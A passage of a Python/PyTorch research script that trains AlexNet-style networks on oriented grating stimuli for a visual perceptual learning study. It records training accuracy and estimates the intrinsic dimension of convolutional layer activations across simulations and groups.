all_simulation_training_accuracy_permuted.append(np.zeros((number_simulation, number_group, 180), dtype = np.float32))
all_simulation_all_ID_permuted.append(np.zeros((number_simulation, number_group, number_layer, 19), dtype = np.float32))
os.mkdir(parent_folder)
for simulation_counter in range(number_simulation):
print('Simulation: ', simulation_counter + 1)
os.mkdir(parent_folder + '/Simulation_' + str(simulation_counter + 1))
group_counter = -1
for group_training in ['group1', 'group2', 'group3', 'group4']:
gc.collect()
best_acc1 = 0
group_counter = group_counter + 1
print('Group: ', group_training)
os.mkdir(parent_folder + '/Simulation_' + str(simulation_counter + 1) + '/' + group_training)
### Training Stimuli
# The structure of image names in different groups
if group_training == 'group1':
SF_training = [170]
Ori_training = [23325, 23350, 23375, 23400, 23425, 23450, 23475, 23500, 23525, 23550,
23650, 23675, 23700, 23725, 23750, 23775, 23800, 23825, 23850, 23875]
elif group_training == 'group2':
SF_training = [53, 170, 276]
Ori_training = [23325, 23350, 23375, 23400, 23425, 23450, 23475, 23500, 23525, 23550,
23650, 23675, 23700, 23725, 23750, 23775, 23800, 23825, 23850, 23875]
elif group_training == 'group3':
SF_training = [170]
Ori_training = [23075, 23100, 23125, 23150, 23175, 23200, 23225, 23250, 23275, 23300,
23900, 23925, 23950, 23975, 24000, 24025, 24050, 24075, 24100, 24125]
elif group_training == 'group4':
SF_training = [53, 170, 276]
Ori_training = [23075, 23100, 23125, 23150, 23175, 23200, 23225, 23250, 23275, 23300,
23900, 23925, 23950, 23975, 24000, 24025, 24050, 24075, 24100, 24125]
# Reading all images
if group_training == 'group1' or group_training == 'group2':
file_name_paths = glob.glob(os.path.dirname(os.path.abspath("./")) + '/data/stimuli/training_groups1&2/*.TIFF')
elif group_training == 'group3' or group_training == 'group4':
file_name_paths = glob.glob(os.path.dirname(os.path.abspath("./")) + '/data/stimuli/training_groups3&4/*.TIFF')
file_names = [os.path.basename(x) for x in file_name_paths]
x_val_training, y_val_training, z_val_training, x_tensor_training, y_tensor_training = reading_stimuli(file_names = file_names, file_name_paths = file_name_paths, orientation = Ori_training, spatial_frequency = SF_training)
x_tensor_training = torch.stack(x_tensor_training)
y_tensor_training = torch.stack(y_tensor_training)
print(x_tensor_training.shape, y_tensor_training.shape)
### SF Transfer Stimuli
# The structure of image names in different groups
if group_training == 'group1':
group_transfer = 'group1'
SF_transfer = [96]
Ori_transfer = [23325, 23350, 23375, 23400, 23425, 23450, 23475, 23500, 23525, 23550,
23650, 23675, 23700, 23725, 23750, 23775, 23800, 23825, 23850, 23875]
elif group_training == 'group2':
group_transfer = 'group2'
SF_transfer= [96]
Ori_transfer = [23325, 23350, 23375, 23400, 23425, 23450, 23475, 23500, 23525, 23550,
23650, 23675, 23700, 23725, 23750, 23775, 23800, 23825, 23850, 23875]
elif group_training == 'group3':
group_transfer = 'group3'
SF_transfer = [96]
Ori_transfer = [23075, 23100, 23125, 23150, 23175, 23200, 23225, 23250, 23275, 23300,
23900, 23925, 23950, 23975, 24000, 24025, 24050, 24075, 24100, 24125]
elif group_training == 'group4':
group_transfer = 'group4'
SF_transfer = [96]
Ori_transfer = [23075, 23100, 23125, 23150, 23175, 23200, 23225, 23250, 23275, 23300,
23900, 23925, 23950, 23975, 24000, 24025, 24050, 24075, 24100, 24125]
# Reading all images
if group_transfer == 'group1' or group_transfer == 'group2':
file_name_paths = glob.glob(os.path.dirname(os.path.abspath("./")) + '/data/stimuli/transferSF_groups1&2/*.TIFF')
elif group_transfer == 'group3' or group_transfer == 'group4':
file_name_paths = glob.glob(os.path.dirname(os.path.abspath("./")) + '/data/stimuli/transferSF_groups3&4/*.TIFF')
file_names = [os.path.basename(x) for x in file_name_paths]
x_val_transfer, y_val_transfer, z_val_transfer, x_tensor_transfer, y_tensor_transfer = reading_stimuli(file_names = file_names, file_name_paths = file_name_paths, orientation = Ori_transfer, spatial_frequency = SF_transfer)
x_tensor_transfer = torch.stack(x_tensor_transfer)
y_tensor_transfer = torch.stack(y_tensor_transfer)
print(x_tensor_transfer.shape, y_tensor_transfer.shape)
for model_counter in range(number_model):
print('DNN Model: ' + str(model_counter + 1))
# Read the reference image
file_name_path_ref = glob.glob(os.path.dirname(os.path.abspath("./")) + '/data/stimuli/reference_stimulus.TIFF')
# Define the main reference variable
x_val_ref = np.zeros((224, 224, 3), dtype = np.float32)
x_tensor_ref = []
# Load image
img = Image.open(file_name_path_ref[0]).convert('RGB')
# Resize image
width, height = img.size
new_width = width * 256 // min(img.size)
new_height = height * 256 // min(img.size)
img = img.resize((new_width, new_height), Image.BILINEAR)
# Center crop image
width, height = img.size
startx = width // 2 - (224 // 2)
starty = height // 2 - (224 // 2)
img = np.asarray(img).reshape(height, width, 3)
img = img[starty:starty + 224, startx:startx + 224]
assert img.shape[0] == 224 and img.shape[1] == 224, (img.shape, height, width)
# Save image
x_val_ref[:, :, :] = img[:, :, :]
# Convert image to tensor, then normalize and copy it
x_temp = torch.from_numpy(np.transpose(x_val_ref[:, :, :], (2, 0, 1)))
normalize = transforms.Normalize(mean = [0.485, 0.456, 0.406], std = [0.229, 0.224, 0.225])
for i in range(len(SF_training) * len(Ori_training)):
x_tensor_ref.append(normalize(x_temp))
x_tensor_ref = torch.stack(x_tensor_ref)
print(x_tensor_ref.shape)
# Select GPU
global device
gpu = 0
os.environ["CUDA_VISIBLE_DEVICES"] = str(gpu)
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
print("Use GPU: {} for training".format(gpu))
# Load the PyTorch model
if model_counter == 0:
model = DNNforVPL_1()
elif model_counter == 1:
model = DNNforVPL_2()
elif model_counter == 2:
model = DNNforVPL_3()
elif model_counter == 3:
model = DNNforVPL_4()
elif model_counter == 4:
model = DNNforVPL_5()
model_dict = model.state_dict()
# Filter out unnecessary keys
pretrained_dict_model = {k : v for k, v in pretrained_dict.items() if k in model_dict}
# Overwrite entries in the existing state dict
model_dict.update(pretrained_dict_model)
# Load the new state dict
model.load_state_dict(model_dict)
# Initialize by zero the weights of the fully-connected layer of the model
nn.init.zeros_(model.classifier[0].weight)
nn.init.zeros_(model.classifier[0].bias)
# Set all the parameters of the model to be trainable
for param in model.parameters():
param.requires_grad = True
# Send the model to GPU/CPU
model = model.to(device)
# Model summary
print(model)
cudnn.benchmark = True
### Extracting the activations of convolutional layers of the network per transfer stimulus before training
# The indices of consecutive convolutional layers: (0, 3, 6, 8, 10)
# The sizes of consecutive convolutional layers: (55, 27, 13, 13, 13)
# The positions of central units of consecutive convolutional layers: (27, 13, 6, 6, 6)
# The number of channels of consecutive convolutional layers: (64, 192, 384, 256, 256)
os.mkdir(parent_folder + '/Simulation_' + str(simulation_counter + 1) + '/' + group_training + '/before_training_' + str(model_counter))
saving_folder = parent_folder + '/Simulation_' + str(simulation_counter + 1) + '/' + group_training + '/before_training_' + str(model_counter)
# The target stimuli
feature_sample_artiphysiology = np.zeros((num_sample_artiphysiology, 3), dtype = np.int64)
all_x_sample = np.zeros((num_sample_artiphysiology, 3, 224, 224), dtype = np.float32)
if model_counter == 0:
all_unit_activity_Conv2d_1 = np.zeros((num_sample_artiphysiology, 64, 55, 55), dtype = np.float32)
elif model_counter == 1:
all_unit_activity_Conv2d_1 = np.zeros((num_sample_artiphysiology, 64, 55, 55), dtype = np.float32)
all_unit_activity_Conv2d_2 = np.zeros((num_sample_artiphysiology, 192, 27, 27), dtype = np.float32)
elif model_counter == 2:
all_unit_activity_Conv2d_1 = np.zeros((num_sample_artiphysiology, 64, 55, 55), dtype = np.float32)
all_unit_activity_Conv2d_2 = np.zeros((num_sample_artiphysiology, 192, 27, 27), dtype = np.float32)
all_unit_activity_Conv2d_3 = np.zeros((num_sample_artiphysiology, 384, 13, 13), dtype = np.float32)
elif model_counter == 3:
all_unit_activity_Conv2d_1 = np.zeros((num_sample_artiphysiology, 64, 55, 55), dtype = np.float32)
all_unit_activity_Conv2d_2 = np.zeros((num_sample_artiphysiology, 192, 27, 27), dtype = np.float32)
all_unit_activity_Conv2d_3 = np.zeros((num_sample_artiphysiology, 384, 13, 13), dtype = np.float32)
all_unit_activity_Conv2d_4 = np.zeros((num_sample_artiphysiology, 256, 13, 13), dtype = np.float32)
elif model_counter == 4:
all_unit_activity_Conv2d_1 = np.zeros((num_sample_artiphysiology, 64, 55, 55), dtype = np.float32)
all_unit_activity_Conv2d_2 = np.zeros((num_sample_artiphysiology, 192, 27, 27), dtype = np.float32)
all_unit_activity_Conv2d_3 = np.zeros((num_sample_artiphysiology, 384, 13, 13), dtype = np.float32)
all_unit_activity_Conv2d_4 = np.zeros((num_sample_artiphysiology, 256, 13, 13), dtype = np.float32)
all_unit_activity_Conv2d_5 = np.zeros((num_sample_artiphysiology, 256, 13, 13), dtype = np.float32)
for i in range(num_sample_artiphysiology):
feature_sample_artiphysiology[i, :] = [SF_transfer[x_sample_artiphysiology_index[i, 0]], Ori_transfer[x_sample_artiphysiology_index[i, 1]], x_sample_artiphysiology_index[i, 2]]
index = torch.tensor(z_val_transfer[x_sample_artiphysiology_index[i, 0], x_sample_artiphysiology_index[i, 1], x_sample_artiphysiology_index[i, 2]], dtype = torch.long)
x_sample = torch.index_select(x_tensor_transfer, 0, index)
x_sample = x_sample.cuda(gpu)
all_x_sample[i, :] = x_sample.detach().cpu().clone().numpy()
if model_counter == 0:
unit_activity_layer_0 = model.features[0](x_sample)
all_unit_activity_Conv2d_1[i, :] = unit_activity_layer_0[0].detach().cpu().clone().numpy()
elif model_counter == 1:
unit_activity_layer_0 = model.features[0](x_sample)
unit_activity_layer_1 = model.features[1](unit_activity_layer_0)
unit_activity_layer_2 = model.features[2](unit_activity_layer_1)
unit_activity_layer_3 = model.features[3](unit_activity_layer_2)
all_unit_activity_Conv2d_1[i, :] = unit_activity_layer_0[0].detach().cpu().clone().numpy()
all_unit_activity_Conv2d_2[i, :] = unit_activity_layer_3[0].detach().cpu().clone().numpy()
elif model_counter == 2:
unit_activity_layer_0 = model.features[0](x_sample)
unit_activity_layer_1 = model.features[1](unit_activity_layer_0)
unit_activity_layer_2 = model.features[2](unit_activity_layer_1)
unit_activity_layer_3 = model.features[3](unit_activity_layer_2)
unit_activity_layer_4 = model.features[4](unit_activity_layer_3)
unit_activity_layer_5 = model.features[5](unit_activity_layer_4)
unit_activity_layer_6 = model.features[6](unit_activity_layer_5)
all_unit_activity_Conv2d_1[i, :] = unit_activity_layer_0[0].detach().cpu().clone().numpy()
all_unit_activity_Conv2d_2[i, :] = unit_activity_layer_3[0].detach().cpu().clone().numpy()
all_unit_activity_Conv2d_3[i, :] = unit_activity_layer_6[0].detach().cpu().clone().numpy()
elif model_counter == 3:
unit_activity_layer_0 = model.features[0](x_sample)
unit_activity_layer_1 = model.features[1](unit_activity_layer_0)
unit_activity_layer_2 = model.features[2](unit_activity_layer_1)
unit_activity_layer_3 = model.features[3](unit_activity_layer_2)
unit_activity_layer_4 = model.features[4](unit_activity_layer_3)
unit_activity_layer_5 = model.features[5](unit_activity_layer_4)
unit_activity_layer_6 = model.features[6](unit_activity_layer_5)
unit_activity_layer_7 = model.features[7](unit_activity_layer_6)
unit_activity_layer_8 = model.features[8](unit_activity_layer_7)
all_unit_activity_Conv2d_1[i, :] = unit_activity_layer_0[0].detach().cpu().clone().numpy()
all_unit_activity_Conv2d_2[i, :] = unit_activity_layer_3[0].detach().cpu().clone().numpy()
all_unit_activity_Conv2d_3[i, :] = unit_activity_layer_6[0].detach().cpu().clone().numpy()
all_unit_activity_Conv2d_4[i, :] = unit_activity_layer_8[0].detach().cpu().clone().numpy()
elif model_counter == 4:
unit_activity_layer_0 = model.features[0](x_sample)
unit_activity_layer_1 = model.features[1](unit_activity_layer_0)
unit_activity_layer_2 = model.features[2](unit_activity_layer_1)
unit_activity_layer_3 = model.features[3](unit_activity_layer_2)
unit_activity_layer_4 = model.features[4](unit_activity_layer_3)
unit_activity_layer_5 = model.features[5](unit_activity_layer_4)
unit_activity_layer_6 = model.features[6](unit_activity_layer_5)
unit_activity_layer_7 = model.features[7](unit_activity_layer_6)
unit_activity_layer_8 = model.features[8](unit_activity_layer_7)
unit_activity_layer_9 = model.features[9](unit_activity_layer_8)
unit_activity_layer_10 = model.features[10](unit_activity_layer_9)
all_unit_activity_Conv2d_1[i, :] = unit_activity_layer_0[0].detach().cpu().clone().numpy()
all_unit_activity_Conv2d_2[i, :] = unit_activity_layer_3[0].detach().cpu().clone().numpy()
all_unit_activity_Conv2d_3[i, :] = unit_activity_layer_6[0].detach().cpu().clone().numpy()
all_unit_activity_Conv2d_4[i, :] = unit_activity_layer_8[0].detach().cpu().clone().numpy()
all_unit_activity_Conv2d_5[i, :] = unit_activity_layer_10[0].detach().cpu().clone().numpy()
# Saving the properties of sample stimuli used for calculating intrinsic dimension
scipy.io.savemat(saving_folder + '/feature_sample_artiphysiology.mat', mdict = {'feature_sample_artiphysiology': feature_sample_artiphysiology})
### Calculating the intrinsic dimension of stimuli
all_x_sample_ID[model_counter][simulation_counter, group_counter] = estimate(squareform(pdist(all_x_sample.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
if model_counter == 0:
all_simulation_all_ID[model_counter][simulation_counter, group_counter, 0, 0] = estimate(squareform(pdist(all_unit_activity_Conv2d_1.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID_permuted[model_counter][simulation_counter, group_counter, 0, 0] = all_simulation_all_ID[model_counter][simulation_counter, group_counter, 0, 0]
elif model_counter == 1:
all_simulation_all_ID[model_counter][simulation_counter, group_counter, 0, 0] = estimate(squareform(pdist(all_unit_activity_Conv2d_1.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID[model_counter][simulation_counter, group_counter, 1, 0] = estimate(squareform(pdist(all_unit_activity_Conv2d_2.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID_permuted[model_counter][simulation_counter, group_counter, 0, 0] = all_simulation_all_ID[model_counter][simulation_counter, group_counter, 0, 0]
all_simulation_all_ID_permuted[model_counter][simulation_counter, group_counter, 1, 0] = all_simulation_all_ID[model_counter][simulation_counter, group_counter, 1, 0]
elif model_counter == 2:
all_simulation_all_ID[model_counter][simulation_counter, group_counter, 0, 0] = estimate(squareform(pdist(all_unit_activity_Conv2d_1.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID[model_counter][simulation_counter, group_counter, 1, 0] = estimate(squareform(pdist(all_unit_activity_Conv2d_2.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID[model_counter][simulation_counter, group_counter, 2, 0] = estimate(squareform(pdist(all_unit_activity_Conv2d_3.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID_permuted[model_counter][simulation_counter, group_counter, 0, 0] = all_simulation_all_ID[model_counter][simulation_counter, group_counter, 0, 0]
all_simulation_all_ID_permuted[model_counter][simulation_counter, group_counter, 1, 0] = all_simulation_all_ID[model_counter][simulation_counter, group_counter, 1, 0]
all_simulation_all_ID_permuted[model_counter][simulation_counter, group_counter, 2, 0] = all_simulation_all_ID[model_counter][simulation_counter, group_counter, 2, 0]
elif model_counter == 3:
all_simulation_all_ID[model_counter][simulation_counter, group_counter, 0, 0] = estimate(squareform(pdist(all_unit_activity_Conv2d_1.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID[model_counter][simulation_counter, group_counter, 1, 0] = estimate(squareform(pdist(all_unit_activity_Conv2d_2.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID[model_counter][simulation_counter, group_counter, 2, 0] = estimate(squareform(pdist(all_unit_activity_Conv2d_3.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID[model_counter][simulation_counter, group_counter, 3, 0] = estimate(squareform(pdist(all_unit_activity_Conv2d_4.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID_permuted[model_counter][simulation_counter, group_counter, 0, 0] = all_simulation_all_ID[model_counter][simulation_counter, group_counter, 0, 0]
all_simulation_all_ID_permuted[model_counter][simulation_counter, group_counter, 1, 0] = all_simulation_all_ID[model_counter][simulation_counter, group_counter, 1, 0]
all_simulation_all_ID_permuted[model_counter][simulation_counter, group_counter, 2, 0] = all_simulation_all_ID[model_counter][simulation_counter, group_counter, 2, 0]
all_simulation_all_ID_permuted[model_counter][simulation_counter, group_counter, 3, 0] = all_simulation_all_ID[model_counter][simulation_counter, group_counter, 3, 0]
elif model_counter == 4:
all_simulation_all_ID[model_counter][simulation_counter, group_counter, 0, 0] = estimate(squareform(pdist(all_unit_activity_Conv2d_1.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID[model_counter][simulation_counter, group_counter, 1, 0] = estimate(squareform(pdist(all_unit_activity_Conv2d_2.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID[model_counter][simulation_counter, group_counter, 2, 0] = estimate(squareform(pdist(all_unit_activity_Conv2d_3.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID[model_counter][simulation_counter, group_counter, 3, 0] = estimate(squareform(pdist(all_unit_activity_Conv2d_4.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID[model_counter][simulation_counter, group_counter, 4, 0] = estimate(squareform(pdist(all_unit_activity_Conv2d_5.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID_permuted[model_counter][simulation_counter, group_counter, 0, 0] = all_simulation_all_ID[model_counter][simulation_counter, group_counter, 0, 0]
all_simulation_all_ID_permuted[model_counter][simulation_counter, group_counter, 1, 0] = all_simulation_all_ID[model_counter][simulation_counter, group_counter, 1, 0]
all_simulation_all_ID_permuted[model_counter][simulation_counter, group_counter, 2, 0] = all_simulation_all_ID[model_counter][simulation_counter, group_counter, 2, 0]
all_simulation_all_ID_permuted[model_counter][simulation_counter, group_counter, 3, 0] = all_simulation_all_ID[model_counter][simulation_counter, group_counter, 3, 0]
all_simulation_all_ID_permuted[model_counter][simulation_counter, group_counter, 4, 0] = all_simulation_all_ID[model_counter][simulation_counter, group_counter, 4, 0]
# Define the main learning parameters
lr = 0.00001
momentum = 0.9
weight_decay = 0.0001
# Define the loss function (criterion) and optimizer
criterion = nn.CrossEntropyLoss().cuda(gpu)
optimizer = torch.optim.SGD(model.parameters(), lr, momentum = momentum, weight_decay = weight_decay)
# Define the main training parameters
start_session = 0
sessions = 1
z_val_shuffle = copy.deepcopy(z_val_training)
for i in range(len(SF_training)):
for j in range(len(Ori_training)):
random.shuffle(z_val_shuffle[i, j, :])
for session in range(start_session, sessions):
# Adjust the learning rate
adjust_learning_rate(optimizer, session, lr)
# Train on a training set
epochs = 180
ID_counter = 0
for epoch in range(epochs):
z_val_shuffle_1D = np.unique(z_val_shuffle[:, :, epoch])
indices = torch.tensor(z_val_shuffle_1D, dtype = torch.long)
x_train = torch.index_select(x_tensor_training, 0, indices)
y_train = torch.index_select(y_tensor_training, 0, indices)
y_train = y_train.squeeze(1)
batch_time = AverageMeter('Time', ':6.3f')
losses = AverageMeter('Loss', ':.4e')
top1 = AverageMeter('Accuracy', ':6.2f')
progress = ProgressMeter(epochs, [batch_time, losses, top1], prefix = ("Training >>> Session: " + str(session) + " Epoch: [{}]").format(epoch))
# Switch to training mode
model.train()
with torch.set_grad_enabled(True):
end = time.time()
x_ref = x_tensor_ref.cuda(gpu)
x_train = x_train.cuda(gpu)
y_train = y_train.cuda(gpu)
# Compute output
output = model(x_train, x_ref)
loss = criterion(output, y_train)
# Measure accuracy and record loss
acc1 = accuracy(output, y_train, topk = 1)
losses.update(loss.item(), x_train.size(0))
top1.update(acc1[0], x_train.size(0))
# Compute gradient and perform SGD step
optimizer.zero_grad()
loss.backward()
optimizer.step()
# Save the validation accuracy for plotting
all_simulation_training_accuracy[model_counter][simulation_counter, group_counter, epoch] = acc1[0].item()
# Measure elapsed time
batch_time.update(time.time() - end)
progress.display(epoch)
# Remember the best accuracy
is_best = all_simulation_training_accuracy[model_counter][simulation_counter, group_counter, epoch] >= best_acc1
best_acc1 = max(all_simulation_training_accuracy[model_counter][simulation_counter, group_counter, epoch], best_acc1)
if (epoch + 1) % 10 == 0:
ID_counter = ID_counter + 1
for i in range(num_sample_artiphysiology):
feature_sample_artiphysiology[i, :] = [SF_transfer[x_sample_artiphysiology_index[i, 0]], Ori_transfer[x_sample_artiphysiology_index[i, 1]], x_sample_artiphysiology_index[i, 2]]
index = torch.tensor(z_val_transfer[x_sample_artiphysiology_index[i, 0], x_sample_artiphysiology_index[i, 1], x_sample_artiphysiology_index[i, 2]], dtype = torch.long)
x_sample = torch.index_select(x_tensor_transfer, 0, index)
x_sample = x_sample.cuda(gpu)
if model_counter == 0:
unit_activity_layer_0 = model.features[0](x_sample)
all_unit_activity_Conv2d_1[i, :] = unit_activity_layer_0[0].detach().cpu().clone().numpy()
elif model_counter == 1:
unit_activity_layer_0 = model.features[0](x_sample)
unit_activity_layer_1 = model.features[1](unit_activity_layer_0)
unit_activity_layer_2 = model.features[2](unit_activity_layer_1)
unit_activity_layer_3 = model.features[3](unit_activity_layer_2)
all_unit_activity_Conv2d_1[i, :] = unit_activity_layer_0[0].detach().cpu().clone().numpy()
all_unit_activity_Conv2d_2[i, :] = unit_activity_layer_3[0].detach().cpu().clone().numpy()
elif model_counter == 2:
unit_activity_layer_0 = model.features[0](x_sample)
unit_activity_layer_1 = model.features[1](unit_activity_layer_0)
unit_activity_layer_2 = model.features[2](unit_activity_layer_1)
unit_activity_layer_3 = model.features[3](unit_activity_layer_2)
unit_activity_layer_4 = model.features[4](unit_activity_layer_3)
unit_activity_layer_5 = model.features[5](unit_activity_layer_4)
unit_activity_layer_6 = model.features[6](unit_activity_layer_5)
all_unit_activity_Conv2d_1[i, :] = unit_activity_layer_0[0].detach().cpu().clone().numpy()
all_unit_activity_Conv2d_2[i, :] = unit_activity_layer_3[0].detach().cpu().clone().numpy()
all_unit_activity_Conv2d_3[i, :] = unit_activity_layer_6[0].detach().cpu().clone().numpy()
elif model_counter == 3:
unit_activity_layer_0 = model.features[0](x_sample)
unit_activity_layer_1 = model.features[1](unit_activity_layer_0)
unit_activity_layer_2 = model.features[2](unit_activity_layer_1)
unit_activity_layer_3 = model.features[3](unit_activity_layer_2)
unit_activity_layer_4 = model.features[4](unit_activity_layer_3)
unit_activity_layer_5 = model.features[5](unit_activity_layer_4)
unit_activity_layer_6 = model.features[6](unit_activity_layer_5)
unit_activity_layer_7 = model.features[7](unit_activity_layer_6)
unit_activity_layer_8 = model.features[8](unit_activity_layer_7)
all_unit_activity_Conv2d_1[i, :] = unit_activity_layer_0[0].detach().cpu().clone().numpy()
all_unit_activity_Conv2d_2[i, :] = unit_activity_layer_3[0].detach().cpu().clone().numpy()
all_unit_activity_Conv2d_3[i, :] = unit_activity_layer_6[0].detach().cpu().clone().numpy()
all_unit_activity_Conv2d_4[i, :] = unit_activity_layer_8[0].detach().cpu().clone().numpy()
elif model_counter == 4:
unit_activity_layer_0 = model.features[0](x_sample)
unit_activity_layer_1 = model.features[1](unit_activity_layer_0)
unit_activity_layer_2 = model.features[2](unit_activity_layer_1)
unit_activity_layer_3 = model.features[3](unit_activity_layer_2)
unit_activity_layer_4 = model.features[4](unit_activity_layer_3)
unit_activity_layer_5 = model.features[5](unit_activity_layer_4)
unit_activity_layer_6 = model.features[6](unit_activity_layer_5)
unit_activity_layer_7 = model.features[7](unit_activity_layer_6)
unit_activity_layer_8 = model.features[8](unit_activity_layer_7)
unit_activity_layer_9 = model.features[9](unit_activity_layer_8)
unit_activity_layer_10 = model.features[10](unit_activity_layer_9)
all_unit_activity_Conv2d_1[i, :] = unit_activity_layer_0[0].detach().cpu().clone().numpy()
all_unit_activity_Conv2d_2[i, :] = unit_activity_layer_3[0].detach().cpu().clone().numpy()
all_unit_activity_Conv2d_3[i, :] = unit_activity_layer_6[0].detach().cpu().clone().numpy()
all_unit_activity_Conv2d_4[i, :] = unit_activity_layer_8[0].detach().cpu().clone().numpy()
all_unit_activity_Conv2d_5[i, :] = unit_activity_layer_10[0].detach().cpu().clone().numpy()
### Calculating the intrinsic dimension
if model_counter == 0:
all_simulation_all_ID[model_counter][simulation_counter, group_counter, 0, ID_counter] = estimate(squareform(pdist(all_unit_activity_Conv2d_1.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
elif model_counter == 1:
all_simulation_all_ID[model_counter][simulation_counter, group_counter, 0, ID_counter] = estimate(squareform(pdist(all_unit_activity_Conv2d_1.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID[model_counter][simulation_counter, group_counter, 1, ID_counter] = estimate(squareform(pdist(all_unit_activity_Conv2d_2.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
elif model_counter == 2:
all_simulation_all_ID[model_counter][simulation_counter, group_counter, 0, ID_counter] = estimate(squareform(pdist(all_unit_activity_Conv2d_1.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID[model_counter][simulation_counter, group_counter, 1, ID_counter] = estimate(squareform(pdist(all_unit_activity_Conv2d_2.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID[model_counter][simulation_counter, group_counter, 2, ID_counter] = estimate(squareform(pdist(all_unit_activity_Conv2d_3.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
elif model_counter == 3:
all_simulation_all_ID[model_counter][simulation_counter, group_counter, 0, ID_counter] = estimate(squareform(pdist(all_unit_activity_Conv2d_1.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID[model_counter][simulation_counter, group_counter, 1, ID_counter] = estimate(squareform(pdist(all_unit_activity_Conv2d_2.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID[model_counter][simulation_counter, group_counter, 2, ID_counter] = estimate(squareform(pdist(all_unit_activity_Conv2d_3.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID[model_counter][simulation_counter, group_counter, 3, ID_counter] = estimate(squareform(pdist(all_unit_activity_Conv2d_4.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
elif model_counter == 4:
all_simulation_all_ID[model_counter][simulation_counter, group_counter, 0, ID_counter] = estimate(squareform(pdist(all_unit_activity_Conv2d_1.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID[model_counter][simulation_counter, group_counter, 1, ID_counter] = estimate(squareform(pdist(all_unit_activity_Conv2d_2.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID[model_counter][simulation_counter, group_counter, 2, ID_counter] = estimate(squareform(pdist(all_unit_activity_Conv2d_3.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID[model_counter][simulation_counter, group_counter, 3, ID_counter] = estimate(squareform(pdist(all_unit_activity_Conv2d_4.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
all_simulation_all_ID[model_counter][simulation_counter, group_counter, 4, ID_counter] = estimate(squareform(pdist(all_unit_activity_Conv2d_5.reshape(num_sample_artiphysiology, -1)), 'euclidean'), fraction = 1.0)[2]
# Save the checkpoint
save_checkpoint({
'session': session + 1,
'state_dict': model.state_dict(),
'best_acc1': best_acc1,
'optimizer': optimizer.state_dict(),
}, is_best, group_training, 'DNNforVPL_' + group_training + '.pth.tar')
# Read the reference image
file_name_path_ref = glob.glob(os.path.dirname(os.path.abspath("./")) + '/data/stimuli/reference_stimulus.TIFF')
# Define the main reference variable
x_val_ref = np.zeros((224, 224, 3), dtype = np.float32)
x_tensor_ref = []
# Load image
img = Image.open(file_name_path_ref[0]).convert('RGB')
# Resize image
width, height = img.size
new_width = width * 256 // min(img.size)
new_height = height * 256 // min(img.size)
img = img.resize((new_width, new_height), Image.BILINEAR)
# Center crop image
width, height = img.size
startx = width // 2 - (224 // 2)
starty = height // 2 - (224 // 2)
img = np.asarray(img).reshape(height, width, 3)
img = img[starty:starty + 224, startx:startx + 224]
assert img.shape[0] == 224 and img.shape[1] == 224, (img.shape, height, width)
# Save image
x_val_ref[:, :, :] = img[:, :, :]
# Convert image to tensor, then normalize and copy it
x_temp = torch.from_numpy(np.transpose(x_val_ref[:, :, :], (2, 0, 1)))
normalize = transforms.Normalize(mean = [0.485, 0.456, 0.406], std = [0.229, 0.224, 0.225])
for i in range(len(SF_transfer) * len(Ori_transfer)):
x_tensor_ref.append(normalize(x_temp))
x_tensor_ref = torch.stack(x_tensor_ref)
print(x_tensor_ref.shape)
# Select GPU
gpu = 0
os.environ["CUDA_VISIBLE_DEVICES"] = str(gpu)
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
print("Use GPU: {} for transfer".format(gpu))
# Set all the parameters of the model to be trainable
for param in model.parameters():
param.requires_grad = False
# Send the model to GPU/CPU
model = model.to(device)
# Model summary
print(model)
cudnn.benchmark = True
# Define the main validation parameters
start_session = 0
sessions = 10
for session in range(start_session, sessions):
z_val_shuffle = copy.deepcopy(z_val_transfer)
for j in range(len(SF_transfer)):
for k in range(len(Ori_transfer)):
